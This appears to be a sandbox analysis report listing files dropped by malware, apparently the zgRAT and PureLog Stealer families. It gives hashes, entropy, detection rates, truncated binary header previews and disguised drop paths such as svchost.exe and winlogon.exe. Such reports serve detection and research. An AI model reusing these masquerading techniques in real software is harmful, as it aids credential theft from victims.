                                                                                                  Size (bytes):797
                                                                                                  Entropy (8bit):5.904114605977836
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:12:OdWv7Rs9KP/jVgTT5GtmOOwnU+u/IAUxPpIRJpYrAjsRvhIuAoxnI2/3CqzEJ:OsEKG+aIJopYUAN1AohVpQ
                                                                                                  MD5:F0730A8D9240CE5098D02C1F442DE4D9
                                                                                                  SHA1:F56016CED691285DAF185DC44873B39FFA08BF78
                                                                                                  SHA-256:3C10AFB7E4C5BC9AB1E8B91906B36ED9CD52459B310EDD6FB9BD501634FF0A23
                                                                                                  SHA-512:0B163CC9A3E9A743E985E3690B2B1A0739866C6ACC8066698568F9BEEF916E6FCB97C80A7877836699F66300DFBA9DE536F57904DD490033DA186933031C7A4B
                                                                                                  Malicious:false
                                                                                                  Preview:SZjUPqm0MRr8hqbgMKVYyjDtEXmVD43kJGEfTfAhMKPkoy1alUMx5c8sVzP2ERwRXGzbm6MqJxMoTdFQgLttrGoqHVJePId4X7Mh8ZypHfnIQTZ1t8V2iDkRbJURwsbBTRRVQiRHXElLcgZx5SuQwkWTX5FzFg2ZEmy9CDkLrOfecYy5tgVe7KOt577VccB0LMHzrav2rjjiF219GKGiLXb4YFDEGPtOMpSPQ9NTvdxXkpnDG7OSWdoxuMbmWqwc0UWZjlsH6wxskDTsbA7IBb2tAefDil6ErVhPTOdfPGVjp6Nq3sKVtobZcmYFFpjV0tBPgDZNhb34GTDERzKzakVC3IxqzXZjg9t647JzT7yRugTIjUyQet5PY8VYQsXJCTXGkHJTpVgcwDSXypHfjJFxDdh6mvikkoPbIMibKelINccUq8jlk1j2NkDGjNr3w52Hy0OmGqVFh6jlANQoL79sFWOiJb17xrVSjVg0t7e4geUQBcFW6Crz5KCblqcoyXRzlRBpqZ4OdFLkB7hrWeAuAgWZTEODezFINepuaaphIdW08bZoIvSTXgzE4lWmL1un9DXgSxQ6zdmgKga1ok4shvurokzzEDVQts05E2VVfWe43T3XLe7l6BFNSq1r7b1vHVxbqexvOiMKR0xVrcnjFuUrnmnYAoYEeswhfcrqrLWYy46b2gAfxSpXBFyD1YukKHqiEQ0Ou724X52sqLgen3RMCYfZnnySawOqOYXmpvu0ZvAFNGXq2Q6Q0efpuakHIkdlrLdSx3y2IawRYZMhQIZKz
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
                                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):3720704
                                                                                                  Entropy (8bit):7.733352681119499
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:98304:HbprIE95gfDVJJBuXHL5btA6w35A9HbAoC1kmXIioFl6:Hbbi1IXr5nmG9Hb7VmX86
                                                                                                  MD5:5FE249BBCC644C6F155D86E8B3CC1E12
                                                                                                  SHA1:F5C550AB2576D2DAEFF9CB72A4D41D1BCFEE0E6D
                                                                                                  SHA-256:9308B0CE7206C60517DB7207C488B4FA1CC313413E5378D8BAC63B22CABCDD80
                                                                                                  SHA-512:B210C6B5D8DB31D8F4EA82A79FE4679CED289636570E3FD72A45C488FD2CD75ED74677D723C1BFA67432E46E71901CB6551595E1053448C2F5E297829A6E1B39
                                                                                                  Malicious:true
                                                                                                  Yara Hits:
                                                                                                  • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\dasHost.exe, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\dasHost.exe, Author: Joe Security
                                                                                                  Antivirus:
                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                  • Antivirus: ReversingLabs, Detection: 92%
                                                                                                  Joe Sandbox View:
                                                                                                  • Filename: 87Bym0x4Fy.exe, Detection: malicious, Browse
                                                                                                  • Filename: 8Ck8T5qRcC.exe, Detection: malicious, Browse
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e..................8.........n.8.. ....8...@.. ....................... 9...........@................................. .8.K.....8.p.....................9...................................................... ............... ..H............text...t.8.. ....8................. ..`.rsrc...p.....8.......8.............@....reloc........9.......8.............@..B................P.8.....H...........L.......n............8......................................0..........(.... ........8........E....N.......)...M...8I...(.... ....~....{....9....& ....8....(.... ....~....{....9....& ....8....*(.... ....8........0.......... ........8........E............Z.......~.......8....~....:.... ....8........~....([...~....(_... ....<.... ....~....{....:....& ....8....8.... ....~....{....:p...& ....8e......... ....~....{....9K...& ....8@...~....(S... .... .... ....s....~...
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):15
                                                                                                  Entropy (8bit):3.773557262275185
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:lrEc:lf
                                                                                                  MD5:A3DC382A742E16CD3332B1E5DCB84D79
                                                                                                  SHA1:2032EDA0B1764238E73B8F8953032FC8D06DBC19
                                                                                                  SHA-256:4ED7F0E3F6DD4C4FB63D1E61CB13507BFD100913C6B736408921BFDCC295B885
                                                                                                  SHA-512:49F7BA0FE4A39CFBE3FCA266BDA1B4F9698DF503E3330001C1D583971578B9CDF76E6448B2556027D0F37038D9C2210CF4FEAA01FD6AA7A2FDB1C8A4E654E67C
                                                                                                  Malicious:false
                                                                                                  Preview:LpnDWo4sy2byP6u
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
                                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):3720704
                                                                                                  Entropy (8bit):7.733352681119499
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:98304:HbprIE95gfDVJJBuXHL5btA6w35A9HbAoC1kmXIioFl6:Hbbi1IXr5nmG9Hb7VmX86
                                                                                                  MD5:5FE249BBCC644C6F155D86E8B3CC1E12
                                                                                                  SHA1:F5C550AB2576D2DAEFF9CB72A4D41D1BCFEE0E6D
                                                                                                  SHA-256:9308B0CE7206C60517DB7207C488B4FA1CC313413E5378D8BAC63B22CABCDD80
                                                                                                  SHA-512:B210C6B5D8DB31D8F4EA82A79FE4679CED289636570E3FD72A45C488FD2CD75ED74677D723C1BFA67432E46E71901CB6551595E1053448C2F5E297829A6E1B39
                                                                                                  Malicious:true
                                                                                                  Yara Hits:
                                                                                                  • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files\Mozilla Firefox\dwm.exe, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\Mozilla Firefox\dwm.exe, Author: Joe Security
                                                                                                  Antivirus:
                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                  • Antivirus: ReversingLabs, Detection: 92%
                                                                                                  Joe Sandbox View:
                                                                                                  • Filename: 87Bym0x4Fy.exe, Detection: malicious, Browse
                                                                                                  • Filename: 8Ck8T5qRcC.exe, Detection: malicious, Browse
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e..................8.........n.8.. ....8...@.. ....................... 9...........@................................. .8.K.....8.p.....................9...................................................... ............... ..H............text...t.8.. ....8................. ..`.rsrc...p.....8.......8.............@....reloc........9.......8.............@..B................P.8.....H...........L.......n............8......................................0..........(.... ........8........E....N.......)...M...8I...(.... ....~....{....9....& ....8....(.... ....~....{....9....& ....8....*(.... ....8........0.......... ........8........E............Z.......~.......8....~....:.... ....8........~....([...~....(_... ....<.... ....~....{....:....& ....8....8.... ....~....{....:p...& ....8e......... ....~....{....9K...& ....8@...~....(S... .... .... ....s....~...
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exe
                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):6127126
                                                                                                  Entropy (8bit):7.9895412495725076
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:98304:J5+ki65sn6Wfz7pnxCjJaWlpx1dstaNoSwKHf1c3z5MOueAeF0FeLkg4ke4U7Fj6:JUCDOYjJlpZstQoS9Hf12VKX9FeLwkys
                                                                                                  MD5:838A5BD59DE32F425938CBA6C119CBEE
                                                                                                  SHA1:3A789DD47202C524F4C10CF37B245174CF02A2F1
                                                                                                  SHA-256:75AFAAE3D0FBA0ECB6E25BE065B68A7D199186714DC6C615311491E66B781FA9
                                                                                                  SHA-512:71B38A9C2BD5A62F01B4B78B4CFCE368977E0A0945372BD33779FE5248E44A0FB1EEC015EFEB13FE3A057D80D20435B9AE04FB3D059E0F3BB525E44A19E268B0
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 55%
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Xhc.Xhc.Xhc...`._hc...f..hc...g.Rhc...[hc..`.Qhc..g.Ihc..f.phc...b.Shc.Xhb..hc.K.g.Ahc.K.a.Yhc.RichXhc.........PE..d...[..f.........."....(.....l.................@......................................]...`.................................................l...x.......4....`..."...Y].H$......h.......................................@...............P............................text............................... ..`.rdata..B&.......(..................@..@.data....s..........................@....pdata..."...`...$..................@..@.rsrc...4...........................@..@.reloc..h...........................@..B........................................................................................................................................................................................................................................................
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exe
                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):11662615
                                                                                                  Entropy (8bit):7.996772653002528
                                                                                                  Encrypted:true
                                                                                                  SSDEEP:196608:QCUDfyGowBdnpkYRMZqsrMELkmHe/tQK3j3fxIyAN7z7FUqVYwD7XmL:QDfDoc6Y6/km6GyxgN7zZFVr7X
                                                                                                  MD5:FC445049713C02F9A9DDAA62E404C9E9
                                                                                                  SHA1:8BCFA380451D9B71B4933E28C9FFB6710D12323E
                                                                                                  SHA-256:B39448F8013728D904A44A3FA4C510539D3FDD2AA35A1355D49E0343852A8556
                                                                                                  SHA-512:14C81AAD762CA16024A35799783F22D244FB88BCC350BEAC27E00CC54B36E822E5FDDDC7CAE414A8A08ED93E2BB93F765C4D2CB3869D552003F9F80B4AD869C4
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                  • Antivirus: ReversingLabs, Detection: 71%
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......U.Q...?...?...?.Z.<...?.Z.:...?.Z.;...?......?...:.9.?...;...?...<...?.Z.>...?...>...?.+.;...?.+.=...?.Rich..?.........................PE..d....+.f.........."....%.....p.................@....................................b%....`.....................................................x....`..e.... ..."...........p..X... ..................................@............... ............................text............................... ..`.rdata...-..........................@..@.data...H3..........................@....pdata..."... ...$..................@..@_RDATA..\....P......................@..@.rsrc...e....`......................@..@.reloc..X....p......................@..B................................................................................................................................................................................................
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\_MEI26762\s.exe
                                                                                                  File Type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):5617152
                                                                                                  Entropy (8bit):7.71585644239634
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:98304:Dei3W2HJn8hqIOLmRLRSo+QqvCRs19A3JIkLJQrAtjRQii7yXdmMpy2N:6Z2i4OcxQECE6ZIkLJIAt8y4
                                                                                                  MD5:1274CBCD6329098F79A3BE6D76AB8B97
                                                                                                  SHA1:53C870D62DCD6154052445DC03888CDC6CFFD370
                                                                                                  SHA-256:BBE5544C408A6EB95DD9980C61A63C4EBC8CCBEECADE4DE4FAE8332361E27278
                                                                                                  SHA-512:A0FEBBD4915791D3C32531FB3CF177EE288DD80CE1C8A1E71FA9AD59A4EBDDEEF69B6BE7F3D19E687B96DC59C8A8FA80AFFF8378A71431C3133F361B28E0D967
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                  • Antivirus: ReversingLabs, Detection: 71%
                                                                                                  Preview:MZ......................@.......................................hr......!..L.!This program cannot be run in DOS mode....$.......PE..d......................(.v....U................@.............................PV.......U...`... ...............................................V......0V.......U..............@V.x.............................U.(.....................V.X............................text....u.......v..................`..`.data...`.U.......U..z..............@....rdata..`.....U......|U.............@..@.pdata........U.......U.............@..@.xdata........U.......U.............@..@.bss.... .....U..........................idata........V.......U.............@....CRT....`.....V.......U.............@....tls......... V.......U.............@....rsrc........0V.......U.............@....reloc..x....@V.......U.............@..B........................................................................................................................................................................
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\_MEI26762\s.exe
                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):4042529
                                                                                                  Entropy (8bit):7.700603596238004
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:98304:yxbprIE95gfDVJJBuXHL5btA6w35A9HbAoC1kmXIioFl6j:4bbi1IXr5nmG9Hb7VmX86j
                                                                                                  MD5:45C59202DCE8ED255B4DBD8BA74C630F
                                                                                                  SHA1:60872781ED51D9BC22A36943DA5F7BE42C304130
                                                                                                  SHA-256:D07C47F759245D34A5B94786637C3D2424C7E3F3DEA3D738D95BF4721DBF3B16
                                                                                                  SHA-512:FFF5B16AE38681ED56782C0F0423560DAB45065685D7272424206F43C80486318180AA22D66BD197C8C530E4C24DBAAAA020BEB76B619DC767EE59FAA27E23ED
                                                                                                  Malicious:true
                                                                                                  Yara Hits:
                                                                                                  • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\ProgramData\svchost.exe, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\ProgramData\svchost.exe, Author: Joe Security
                                                                                                  Antivirus:
                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                  • Antivirus: ReversingLabs, Detection: 79%
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x_c.<>..<>..<>......1>.......>......$>...I.>>...I../>...I..+>...I...>..5F..7>..5F..;>..<>..)?...I...>...I..=>...I.=>...I..=>..Rich<>..........PE..L..... b............................0........0....@..........................P............@.........................p...4.......P....@....................... ..<#......T............................U..@............0..x....... ....................text............................... ..`.rdata.......0....... ..............@..@.data... G..........................@....didat.......0......................@....rsrc........@......................@..@.reloc..<#... ...$..................@..B................................................................................................................................................................................................................................................
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
                                                                                                  File Type:ASCII text, with very long lines (804), with no line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):804
                                                                                                  Entropy (8bit):5.876714645231957
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:St6kYJy7liBUWXVjSrpzg3yEq1JBoLd1Iv0Q:6eklkHF2ruBAGd187
                                                                                                  MD5:4A683BC796B829A908187BF3782B94A1
                                                                                                  SHA1:15997C7EED3337FB959F8BBD2483B5579B2C519F
                                                                                                  SHA-256:C6ED4D6441C9A454117CEAEEEF137FCAA7059DF7B5914A4D62854B3ED493BCC4
                                                                                                  SHA-512:2EFB5189EF1BEDC826BCB4E753E1A47C183B3FC5FBF1A604159F8A543A1854E64B91F5F52479CB41687CF896A509085A39E3534F6D3BE3BC7B0EF79C7318C5C8
                                                                                                  Malicious:false
                                                                                                  Preview:96M2yAu46Ivd7NyEAClbcPW6Uk2EX9j2J70D3L7k2kD3FHOfuVugVrVtjPiNIqh7i2UAWvKyFBi1Md0NWWTCPDhblGdonubMDGUNwNJ8K5aTIdhFYU0vWfreU2YPSgLVjWyFInaINV1TmOSHjXPS3q0iY033y3qouFtwpb7v3rhBnY2GkQq4Q2b3gQrSthUUoNjgegcHaeYLIy4A7wTiMwY1o0QYuoBWXNWazVmDyjdvdQurVrU6NvH2yr2oQDWwcCx4ceLmKQunSmXXFiCDTEIlFelHc7xuMrSbc0P1gsv7BejLTeirBTcX3Ly72DJMc9akU64PTLhlSLjl4ay8ZFt2P4iQBR9cjieCD81XjTYzw1ErmNDcPLxXQhVZXnOCLEBuqhh5iaYGr3GXz0oxOhNYvGvfnc95FWorzUAEpH3ywrqXa8jg9axo1n8jwCSFbcAUOZie0kIGnYlDaXEp3c6oiAzLWaRnzxXUqVIBZEqYRrAcC4JY7nM8fWwOjWIZSfRzBQXEPDPywiW09XIbR3pLkZzUj3bD5RFwaKbwhEI3YYL795PMNrHZzFOlbCfVlM2ecjay5W3MuvxMN1VnoPzOKq7U60UfixSLfreZfaQ0x4oDRCXjq2qWXnUvmF2FCYo7dlrgX6HN88bPC4C4cuyqG6y1WtwZiLyZQrjqU1MuucXYMEtrC8nRj70hwzJnJrpxJC9UUWjliE5oiapS9FWkihzS1C3erikCxkOJEYWqYBsfCM8WK1oEVFOmNrdSdE39d218LfNlsqLgyUPpDgT04grrVm6X4ENU
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
                                                                                                  File Type:ASCII text, with very long lines (986), with no line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):986
                                                                                                  Entropy (8bit):5.9062580396937605
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:qQgwMT/Ct5OjSWjokxDH+rJ/kIyJKxwYWUXjHprSj2BT1Yg1P:OwMjC/2jokpHO/kdkxwbUXjHpvVTP
                                                                                                  MD5:927826CB91B1EFA4B55C6FE22B455D22
                                                                                                  SHA1:30923DAA2622BF26C36256C807E543BEC6AA0929
                                                                                                  SHA-256:6394934D64BA00871BD7E320D61C9843E764656E2A50DD8DC73BDA88377957A1
                                                                                                  SHA-512:D2257099A882D043EDAE78A69CC9AA29E06C0C0630D704DBB3E1298070FA19864D09589A363E72BF5E2318F74003B7980D596D09E38EFD52D48980A75680D1FA
                                                                                                  Malicious:false
                                                                                                  Preview:m22yockvATTQ8a6tnrDLQoq01lnIfWzR5iBN4WMtcLSnaCxQPW43aLs7MB7DycPodBVZZsyQfUtFWCZyxX3Ib61tzDA2ZJ5A5oKZrX1ghnXGcnlJmIPbiGMgJlkVr60WZsJr1AHafXkxivRLb1QR4dczcoPFxgylxBrte4RmAz5LfY7XTY30pjc5PTPNuCm9i9AhEhrhjnQFiRTEq2vZm75NjveKoE28M5mgXaTwrVRBSXW7ALg2QNXkDx7SDg3evS2mpxqQi9rQq34MZgKchAr8iBdkcAtKcwQAetSNeQTRfG4J2v3gVa6vk4EnTGxiQhy3n3rpN78RqZccGTrrGMyBzeZkpo3YduB8RBf8DOTYcpELbmhAYGbDswDJeHAiEjy6XeKFysn23ajKZOICH39WS7Qe7We5OuU21Ix7cbMqcjKSN3tP97bLjbnaOqHbOsnIFqSRbLkpqT4tx7QEnP6QTJSafXtwUuct5BMglbyyXveQg3mQZDx8vXz6X1vDbyV61KxvvudLaI3ioC4ludWR7d8iLPJtquWiZiZVG1eojlindRRV7JT8bE8YMPjgkufpvUIGnif38rrV4UE47xvgbYHUjBJ1R8EzG22IIKsZoZ9tWnd2Kpix89OXNyhlZnm9n2PCc6vwFW1CYX75hRrlaQ0Gne4UnGAAxAFeYaZO3vsmHM900mEI6AjXBIY7BaJ8W1OXRdhG1csoiN8bfEeBC1DwascPCcNcmtQQ7liWE7ReS5yxK7c66I6exc7jASEZPPBz7se4fH6Fkjef3pFFAQgexwdfn8Ww22OC390bchayM13N7bpVN9Y9shBLO8QhvJMsVbl4ynmczsR62PhMTAj3dOUV7oNeR3CCoK2fzvgjW6KAPFS9bENukSPGHQ6KaIL5pPRrXCWhe9ggETG2WNCNpRbW5vXjyWJOvOUAxkmZrpQkvtCyKExMF7PYx5wlowtIzSvz9FEvknfAB0kMsj
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
                                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):3720704
                                                                                                  Entropy (8bit):7.733352681119499
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:98304:HbprIE95gfDVJJBuXHL5btA6w35A9HbAoC1kmXIioFl6:Hbbi1IXr5nmG9Hb7VmX86
                                                                                                  MD5:5FE249BBCC644C6F155D86E8B3CC1E12
                                                                                                  SHA1:F5C550AB2576D2DAEFF9CB72A4D41D1BCFEE0E6D
                                                                                                  SHA-256:9308B0CE7206C60517DB7207C488B4FA1CC313413E5378D8BAC63B22CABCDD80
                                                                                                  SHA-512:B210C6B5D8DB31D8F4EA82A79FE4679CED289636570E3FD72A45C488FD2CD75ED74677D723C1BFA67432E46E71901CB6551595E1053448C2F5E297829A6E1B39
                                                                                                  Malicious:true
                                                                                                  Yara Hits:
                                                                                                  • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Recovery\powershell.exe, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\powershell.exe, Author: Joe Security
                                                                                                  Antivirus:
                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                  • Antivirus: ReversingLabs, Detection: 92%
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e..................8.........n.8.. ....8...@.. ....................... 9...........@................................. .8.K.....8.p.....................9...................................................... ............... ..H............text...t.8.. ....8................. ..`.rsrc...p.....8.......8.............@....reloc........9.......8.............@..B................P.8.....H...........L.......n............8......................................0..........(.... ........8........E....N.......)...M...8I...(.... ....~....{....9....& ....8....(.... ....~....{....9....& ....8....*(.... ....8........0.......... ........8........E............Z.......~.......8....~....:.... ....8........~....([...~....(_... ....<.... ....~....{....:....& ....8....8.... ....~....{....:p...& ....8e......... ....~....{....9K...& ....8@...~....(S... .... .... ....s....~...
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
                                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):3720704
                                                                                                  Entropy (8bit):7.733352681119499
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:98304:HbprIE95gfDVJJBuXHL5btA6w35A9HbAoC1kmXIioFl6:Hbbi1IXr5nmG9Hb7VmX86
                                                                                                  MD5:5FE249BBCC644C6F155D86E8B3CC1E12
                                                                                                  SHA1:F5C550AB2576D2DAEFF9CB72A4D41D1BCFEE0E6D
                                                                                                  SHA-256:9308B0CE7206C60517DB7207C488B4FA1CC313413E5378D8BAC63B22CABCDD80
                                                                                                  SHA-512:B210C6B5D8DB31D8F4EA82A79FE4679CED289636570E3FD72A45C488FD2CD75ED74677D723C1BFA67432E46E71901CB6551595E1053448C2F5E297829A6E1B39
                                                                                                  Malicious:true
                                                                                                  Yara Hits:
                                                                                                  • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Recovery\winlogon.exe, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\winlogon.exe, Author: Joe Security
                                                                                                  Antivirus:
                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                  • Antivirus: ReversingLabs, Detection: 92%
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e..................8.........n.8.. ....8...@.. ....................... 9...........@................................. .8.K.....8.p.....................9...................................................... ............... ..H............text...t.8.. ....8................. ..`.rsrc...p.....8.......8.............@....reloc........9.......8.............@..B................P.8.....H...........L.......n............8......................................0..........(.... ........8........E....N.......)...M...8I...(.... ....~....{....9....& ....8....(.... ....~....{....9....& ....8....*(.... ....8........0.......... ........8........E............Z.......~.......8....~....:.... ....8........~....([...~....(_... ....<.... ....~....{....:....& ....8....8.... ....~....{....:p...& ....8e......... ....~....{....9K...& ....8@...~....(S... .... .... ....s....~...
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
                                                                                                  File Type:ASCII text, with very long lines (393), with no line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):393
                                                                                                  Entropy (8bit):5.87061182098536
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:6:eG7qah4TWoNJ1bRHpn0IkN+awloMHm8/uGNssJBkGwzSXIHhADOekfTufs:72PbP0RGHmkuGNssJq+/DOekfTuU
                                                                                                  MD5:85734B19D77BA989E767BA3195EEA520
                                                                                                  SHA1:0E37ADBFC1A4347A193BE22687AA4D39A2E04C5F
                                                                                                  SHA-256:9DCD04CBDED20E30CB016766C1030D73B848EA423E21C8256DD84F0D41C61D95
                                                                                                  SHA-512:FDC81A32A858628B666083554BFE1E46F97F933E432825C23283F784C6A5ABEEA3EF88D64F75AA625386875EA39AC0C036F2D5673980CBFDBDA78B3557D4F35A
                                                                                                  Malicious:false
                                                                                                  Preview:BmF29bEIasORUOD0AKSwuVtZFCjrfs689BL4LPatuzZBoahAHwrpAmnp3qx61XmrwPSSDIpuuiB55supfijsAR8WYfBfcd2XMsPYIO79H74blrtK5HbSx3qfR54hGKSQqosNcWhQlklDWhvqw0jUBkjTBuHMUa27onv78gsikLrNRnIuKNvQk7OFEZMsPU6KroZswysPIBu03VBXlXBHpmWqYp2iU9TPOgfnOZ8WefHjNYMtYyG1SyeFRsUG6J5IrelW0XJMZpmKexdAcJKf3c7aBaVgF1aVj92tw02Ao4cnMUkePTow8ZPPhLUZBnGhPRkf5tOmQJ199UOrz1QvNnWJtnMkgd8Ax5X4uFifECgyiPPN7nkKWUUm4bvShoFxL0MD6T6uS
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
                                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):3720704
                                                                                                  Entropy (8bit):7.733352681119499
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:98304:HbprIE95gfDVJJBuXHL5btA6w35A9HbAoC1kmXIioFl6:Hbbi1IXr5nmG9Hb7VmX86
                                                                                                  MD5:5FE249BBCC644C6F155D86E8B3CC1E12
                                                                                                  SHA1:F5C550AB2576D2DAEFF9CB72A4D41D1BCFEE0E6D
                                                                                                  SHA-256:9308B0CE7206C60517DB7207C488B4FA1CC313413E5378D8BAC63B22CABCDD80
                                                                                                  SHA-512:B210C6B5D8DB31D8F4EA82A79FE4679CED289636570E3FD72A45C488FD2CD75ED74677D723C1BFA67432E46E71901CB6551595E1053448C2F5E297829A6E1B39
                                                                                                  Malicious:true
                                                                                                  Yara Hits:
                                                                                                  • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\Public\Pictures\wouVpTZDoyPyABKEH.exe, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\Public\Pictures\wouVpTZDoyPyABKEH.exe, Author: Joe Security
                                                                                                  Antivirus:
                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                  • Antivirus: ReversingLabs, Detection: 92%
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e..................8.........n.8.. ....8...@.. ....................... 9...........@................................. .8.K.....8.p.....................9...................................................... ............... ..H............text...t.8.. ....8................. ..`.rsrc...p.....8.......8.............@....reloc........9.......8.............@..B................P.8.....H...........L.......n............8......................................0..........(.... ........8........E....N.......)...M...8I...(.... ....~....{....9....& ....8....(.... ....~....{....9....& ....8....*(.... ....8........0.......... ........8........E............Z.......~.......8....~....:.... ....8........~....([...~....(_... ....<.... ....~....{....:....& ....8....8.... ....~....{....:p...& ....8e......... ....~....{....9K...& ....8@...~....(S... .... .... ....s....~...
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1915
                                                                                                  Entropy (8bit):5.363869398054153
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:MxHKQwYHKGSI6oPtHTHhAHKKkt1qHGIs0HKjJHVHmHKlT4vHNpv:iqbYqGSI6oPtzHeqKktwmj0qV1GqZ4vb
                                                                                                  MD5:0C47412B6C6EF6C70D4B96E4717A5D3B
                                                                                                  SHA1:666FCC7898B52264D8A144600D7A3B0B59E39D66
                                                                                                  SHA-256:0B3F6655476FA555F55859443DE496AF7279529D291EF9745C22C5C283B648F9
                                                                                                  SHA-512:4E51FCBCA176BF9C5175478C23AE01445F13D9AC93771C7F73782AF9D98E8544A82BBFB5D3AA6E2F3ECF1EFB59A8466EB763A30BD795EFE78EE46429B2BEAC6C
                                                                                                  Malicious:false
